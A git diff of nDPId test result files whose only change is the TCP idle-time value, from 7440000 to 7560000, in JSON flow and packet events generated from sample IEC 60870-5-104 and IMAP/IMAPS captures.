-00693{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":147,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":47,"flow_first_seen":1219992819942,"flow_last_seen":1219993055118,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":417,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1219993055118,"l3_proto":"ip4","src_ip":"172.27.248.109","dst_ip":"172.27.248.79","src_port":1578,"dst_port":2404,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IEC60870","breed":"Acceptable","category":"IoT-Scada"}} +00693{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":117,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":25,"flow_first_seen":1219992590188,"flow_last_seen":1219992781349,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":110,"flow_avg_l4_payload_len":4,"midstream":0,"thread_ts_msec":1219992910077,"l3_proto":"ip4","src_ip":"172.27.248.109","dst_ip":"172.27.248.79","src_port":1572,"dst_port":2404,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IEC60870","breed":"Acceptable","category":"IoT-Scada"}} 
+00692{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":124,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":1219992782348,"flow_last_seen":1219992818955,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":17,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":2,"midstream":0,"thread_ts_msec":1219992961194,"l3_proto":"ip4","src_ip":"172.27.248.109","dst_ip":"172.27.248.79","src_port":1577,"dst_port":2404,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IEC60870","breed":"Acceptable","category":"IoT-Scada"}} +00693{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":147,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":47,"flow_first_seen":1219992819942,"flow_last_seen":1219993055118,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":417,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1219993055118,"l3_proto":"ip4","src_ip":"172.27.248.109","dst_ip":"172.27.248.79","src_port":1578,"dst_port":2404,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IEC60870","breed":"Acceptable","category":"IoT-Scada"}} 00562{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":147,"source":"iec60780-5-104.pcap","alias":"nDPId-test","packets-captured":147,"packets-processed":147,"total-skipped-flows":0,"total-l4-data-len":748,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":6,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":6,"total-idle-flows":6,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":40,"global_ts_msec":1219993055118} ~~~~~~~~~~~~~~~~~~~~ SUMMARY 
~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 147/147 diff --git a/test/results/imap-starttls.pcap.out b/test/results/imap-starttls.pcap.out index 1a79acf73..af6bf749c 100644 --- a/test/results/imap-starttls.pcap.out +++ b/test/results/imap-starttls.pcap.out 
@@ -1,11 +1,11 @@ 00464{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"imap-starttls.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00550{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"imap-starttls.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1437584567812} -00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"imap-starttls.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437584567812,"flow_last_seen":1437584567812,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1437584567812,"l3_proto":"ip4","src_ip":"192.168.17.53","dst_ip":"212.227.17.186","src_port":49640,"dst_port":143,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"imap-starttls.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1437584567812,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1437584567812,"pkt":"kFmvW2bUaKhtGGkOCABFAABAc8pAAEAGDnPAqBE11OMRusHoAI+CJObQAAAAALAC\/\/\/XTwAAAgQFtAEDAwQBAQgKKoxROgAAAAAEAgAA"} -00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"imap-starttls.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1437584568002,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1437584568002,"pkt":"aKhtGGkOkFmvW2bUCABFIAA0AABAADAGkinU4xG6wKgRNQCPwehPqEW7giTm0YASPryvAAAAAgQFtAQCAwMKAAAA"} -00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"imap-starttls.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1437584568002,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1437584568002,"pkt":"kFmvW2bUaKhtGGkOCABFAAAohpRAAEAG+8DAqBE11OMRusHoAI+CJObRT6hFvFAQQAD2hgAA"} -00782{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":10,"source":"imap-starttls.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1437584567812,"flow_last_seen":1437584568383,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":271,"flow_tot_l4_payload_len":524,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1437584568383,"l3_proto":"ip4","src_ip":"192.168.17.53","dst_ip":"212.227.17.186","src_port":49640,"dst_port":143,"l4_proto":"tcp","ndpi": 
{"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"IMAPS","breed":"Safe","category":"Email"}} -00823{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":32,"source":"imap-starttls.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":32,"flow_first_seen":1437584567812,"flow_last_seen":1437584570828,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":6193,"flow_avg_l4_payload_len":193,"midstream":0,"thread_ts_msec":1437584570828,"l3_proto":"ip4","src_ip":"192.168.17.53","dst_ip":"212.227.17.186","src_port":49640,"dst_port":143,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"IMAPS","breed":"Safe","category":"Email"}} +00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"imap-starttls.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437584567812,"flow_last_seen":1437584567812,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1437584567812,"l3_proto":"ip4","src_ip":"192.168.17.53","dst_ip":"212.227.17.186","src_port":49640,"dst_port":143,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"imap-starttls.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1437584567812,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1437584567812,"pkt":"kFmvW2bUaKhtGGkOCABFAABAc8pAAEAGDnPAqBE11OMRusHoAI+CJObQAAAAALAC\/\/\/XTwAAAgQFtAEDAwQBAQgKKoxROgAAAAAEAgAA"} +00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"imap-starttls.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1437584568002,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1437584568002,"pkt":"aKhtGGkOkFmvW2bUCABFIAA0AABAADAGkinU4xG6wKgRNQCPwehPqEW7giTm0YASPryvAAAAAgQFtAQCAwMKAAAA"} +00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"imap-starttls.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1437584568002,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1437584568002,"pkt":"kFmvW2bUaKhtGGkOCABFAAAohpRAAEAG+8DAqBE11OMRusHoAI+CJObRT6hFvFAQQAD2hgAA"} +00782{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":10,"source":"imap-starttls.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1437584567812,"flow_last_seen":1437584568383,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":271,"flow_tot_l4_payload_len":524,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1437584568383,"l3_proto":"ip4","src_ip":"192.168.17.53","dst_ip":"212.227.17.186","src_port":49640,"dst_port":143,"l4_proto":"tcp","ndpi": 
{"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"IMAPS","breed":"Safe","category":"Email"}} +00823{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":32,"source":"imap-starttls.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":32,"flow_first_seen":1437584567812,"flow_last_seen":1437584570828,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":6193,"flow_avg_l4_payload_len":193,"midstream":0,"thread_ts_msec":1437584570828,"l3_proto":"ip4","src_ip":"192.168.17.53","dst_ip":"212.227.17.186","src_port":49640,"dst_port":143,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"IMAPS","breed":"Safe","category":"Email"}} 00558{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":32,"source":"imap-starttls.pcap","alias":"nDPId-test","packets-captured":32,"packets-processed":32,"total-skipped-flows":0,"total-l4-data-len":6193,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1437584570828} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 32/32 diff --git a/test/results/imap.pcap.out b/test/results/imap.pcap.out index f266171bd..86b8dbb9b 100644 --- a/test/results/imap.pcap.out +++ b/test/results/imap.pcap.out 
@@ -1,11 +1,11 @@ 00455{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"imap.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00541{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"imap.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1213095262213} -00565{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"imap.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1213095262213,"flow_last_seen":1213095262213,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1213095262213,"l3_proto":"ip4","src_ip":"10.40.4.2","dst_ip":"10.40.3.2","src_port":46045,"dst_port":143,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"imap.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1213095262213,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1213095262213,"pkt":"AASWJ8g6ABUXJM1lCABFAAA8nkhAAEAGgSAKKAQCCigDArPdAI+IaqplAAAAAKACFtDwZgAAAgQFtAQCCAoKDDQtAAAAAAEDAwc="} -00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"imap.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1213095262213,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1213095262213,"pkt":"ABUXJM1lAASWJ8g6CABFAAA8VURAAH8GiyQKKAMCCigEAgCPs903+0YNiGqqZqASIAAxdQAAAgQFtAEDAwgEAggKAoc1IAoMNC0="} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"imap.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1213095262213,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1213095262213,"pkt":"AASWJ8g6ABUXJM1lCABFAAA0nklAAEAGgScKKAQCCigDArPdAI+IaqpmN\/tGDoAQAC6AFAAAAQEICgoMNC0ChzUg"} -00787{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":11,"source":"imap.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1213095262213,"flow_last_seen":1213095266594,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":65,"flow_tot_l4_payload_len":184,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1213095266594,"l3_proto":"ip4","src_ip":"10.40.4.2","dst_ip":"10.40.3.2","src_port":46045,"dst_port":143,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": 
{"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"IMAP","breed":"Unsafe","category":"Email"},"imap": {"user":"samir","password":"pfres"}} -00784{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":33,"source":"imap.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":33,"flow_first_seen":1213095262213,"flow_last_seen":1213095266780,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":696,"flow_tot_l4_payload_len":1580,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1213095266780,"l3_proto":"ip4","src_ip":"10.40.4.2","dst_ip":"10.40.3.2","src_port":46045,"dst_port":143,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"IMAP","breed":"Unsafe","category":"Email"}} +00565{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"imap.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1213095262213,"flow_last_seen":1213095262213,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1213095262213,"l3_proto":"ip4","src_ip":"10.40.4.2","dst_ip":"10.40.3.2","src_port":46045,"dst_port":143,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"imap.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1213095262213,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1213095262213,"pkt":"AASWJ8g6ABUXJM1lCABFAAA8nkhAAEAGgSAKKAQCCigDArPdAI+IaqplAAAAAKACFtDwZgAAAgQFtAQCCAoKDDQtAAAAAAEDAwc="} +00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"imap.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1213095262213,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1213095262213,"pkt":"ABUXJM1lAASWJ8g6CABFAAA8VURAAH8GiyQKKAMCCigEAgCPs903+0YNiGqqZqASIAAxdQAAAgQFtAEDAwgEAggKAoc1IAoMNC0="} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"imap.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1213095262213,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1213095262213,"pkt":"AASWJ8g6ABUXJM1lCABFAAA0nklAAEAGgScKKAQCCigDArPdAI+IaqpmN\/tGDoAQAC6AFAAAAQEICgoMNC0ChzUg"} +00787{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":11,"source":"imap.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1213095262213,"flow_last_seen":1213095266594,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":65,"flow_tot_l4_payload_len":184,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1213095266594,"l3_proto":"ip4","src_ip":"10.40.4.2","dst_ip":"10.40.3.2","src_port":46045,"dst_port":143,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": 
{"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"IMAP","breed":"Unsafe","category":"Email"},"imap": {"user":"samir","password":"pfres"}} +00784{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":33,"source":"imap.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":33,"flow_first_seen":1213095262213,"flow_last_seen":1213095266780,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":696,"flow_tot_l4_payload_len":1580,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1213095266780,"l3_proto":"ip4","src_ip":"10.40.4.2","dst_ip":"10.40.3.2","src_port":46045,"dst_port":143,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"IMAP","breed":"Unsafe","category":"Email"}} 00549{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":33,"source":"imap.pcap","alias":"nDPId-test","packets-captured":33,"packets-processed":33,"total-skipped-flows":0,"total-l4-data-len":1580,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1213095266780} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 33/33 diff --git a/test/results/imaps.pcap.out b/test/results/imaps.pcap.out index 8e09d13ba..f46019265 100644 --- a/test/results/imaps.pcap.out +++ b/test/results/imaps.pcap.out 
@@ -1,13 +1,13 @@ 00456{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"imaps.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00542{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"imaps.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1590857744659} -00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"imaps.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1590857744659,"flow_last_seen":1590857744659,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1590857744659,"l3_proto":"ip4","src_ip":"192.168.1.8","dst_ip":"167.99.215.164","src_port":50506,"dst_port":993,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"imaps.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1590857744659,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1590857744659,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG+f\/AqAEIp2PXpMVKA+HRNM\/NAAAAALAC\/\/\/ajwAAAgQFtAEDAwUBAQgKFE2dOQAAAAAEAgAA"} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"imaps.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1590857744706,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1590857744706,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQGBgSnY9ekwKgBCAPhxUrMi6La0TTPzqAS\/ojr6QAAAgQFrAQCCAqpw+fsFE2dOQEDAwc="} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"imaps.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1590857744706,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1590857744706,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG+gvAqAEIp2PXpMVKA+HRNM\/OzIui24AQECwI4wAAAQEIChRNnWGpw+fs"} -00951{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"imaps.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1590857744659,"flow_last_seen":1590857744710,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":227,"flow_tot_l4_payload_len":227,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1590857744710,"l3_proto":"ip4","src_ip":"192.168.1.8","dst_ip":"167.99.215.164","src_port":50506,"dst_port":993,"l4_proto":"tcp","ndpi": 
{"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mail.ntop.org","ja3":"4923a265be4d81c68ecda45bb89cdf6a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01008{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"imaps.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1590857744659,"flow_last_seen":1590857744765,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1667,"flow_avg_l4_payload_len":277,"midstream":0,"thread_ts_msec":1590857744765,"l3_proto":"ip4","src_ip":"192.168.1.8","dst_ip":"167.99.215.164","src_port":50506,"dst_port":993,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mail.ntop.org","ja3":"4923a265be4d81c68ecda45bb89cdf6a","ja3s":"b653c251b0ee54c3088fe7bb997cf59d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384"}} 